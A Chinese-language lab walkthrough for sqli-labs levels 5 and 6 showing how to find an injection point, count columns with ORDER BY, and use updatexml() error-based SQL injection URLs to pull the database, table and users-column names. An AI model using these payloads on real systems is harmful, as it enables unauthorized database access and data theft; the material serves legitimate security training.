sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数

复制代码
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 5

复制代码
SQLI DUMB SERIES-5
判断注入点:
	1. 首先,尝试正常的回显内容,如?id=1。
	2. 接着,输入?id=1'来查看是否出现语句错误。如果出现,那么可能存在单引号的闭合问题。
判断当前表的字段数:
	 使用order by语句来判断当前表的字段数。例如,?id=1' order by 3--和?id=1' order by 4--,通过页面回显的结果来确定字段数。
使用错误函数注入爆库名:
	1. 既然没有直接的回显信息,您可以使用MySQL的updatexml()函数来触发错误并提取信息。updatexml()函数在第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
	2. 尝试使用类似?id=1' and updatexml(1, concat(0x7e, version()), 3)--的语句来提取数据库版本信息。
	3. 逐步构造更复杂的语句来提取其他信息,如数据库名、表名等。

判断注入点

通过测试可知使用单引号会使得系统报语法报错

sql 复制代码
http://sqli-labs.com/Less-5/
?id=1'

即使使用注释语句重新获取数据页面中也不回显数据。

意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。

updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。

语法:updatexml(XML_document,XPath_string,new_value)

XML_document:是string格式,为XML文档对象的名称

XPath_string:代表路径,Xpath格式的字符串例如

new_value:string格式,替换查找到的符合条件的数据

updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)

注入

通过报错注入代码,查看数据库名称:

sql 复制代码
http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",database()),3) --+

获取该数据库的表名:

sql 复制代码
http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(table_name) from information_schema.tables where table_schema='security')
),3) --+

注入查询users表的列名:

sql 复制代码
http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')
),3) --+

Less 6

复制代码
SQLI DUMB SERIES-5
判断注入点:同第五关。
判断当前表的字段数:同第五关。
使用错误函数注入提取信息:同第五关。

判断注入点

输入双引号后报错的响应可知为闭合符号:

sql 复制代码
http://sqli-labs.com/Less-6/
?id=1" 

继续判断字段数量,当数字为3时没报错,得知为3个字段。

sql 复制代码
http://sqli-labs.com/Less-6/
?id=1" order by 3 --+

注入

输入正确不返回数据,则我们通过错误函数注入获取数据库。

sql 复制代码
http://sqli-labs.com/Less-6/
?id=1" union select updatexml(1,concat('~',database()),3); --+

在错误函数注入中输入语句,用于获取该数据库表名

sql 复制代码
http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(table_name) from information_schema.tables where table_schema=database())
),3); --+

注入获取数据表列名。

sql 复制代码
http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')
),3); --+

系列文章

相关推荐
林熙蕾LXL8 小时前
SQL Server——基本操作
数据库·sql
FLS16810 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
007php00710 小时前
某大厂MySQL面试之SQL注入触点发现与SQLMap测试
数据库·python·sql·mysql·面试·职场和发展·golang
Ultipa15 小时前
查询语言的进化:SQL之后,为什么是GQL?数据世界正在改变
数据库·sql·图数据库·gql
LB211215 小时前
SQL隐式链接显式连接
大数据·数据库·sql
GM_82818 小时前
【Go项目基建】GORM框架实现SQL校验拦截器(完整源码+详解)
sql·golang·拦截器·gorm·慢查询·持久层基建
半夏陌离1 天前
SQL 拓展指南:不同数据库差异对比(MySQL/Oracle/SQL Server 基础区别)
大数据·数据库·sql·mysql·oracle·数据库架构
旋转的油纸伞1 天前
SQL表一共有几种写入方式
数据库·sql
isyoungboy1 天前
SQL高效处理海量GPS轨迹数据:人员gps轨迹数据抽稀实战指南
数据库·sql
练小杰1 天前
【Mysql-installer-community-8.0.26.0】Mysql 社区版(8.0.26.0) 在Window 系统的默认安装配置
数据库·sql·mysql·adb·配置文件·mysql安装·关系型数据库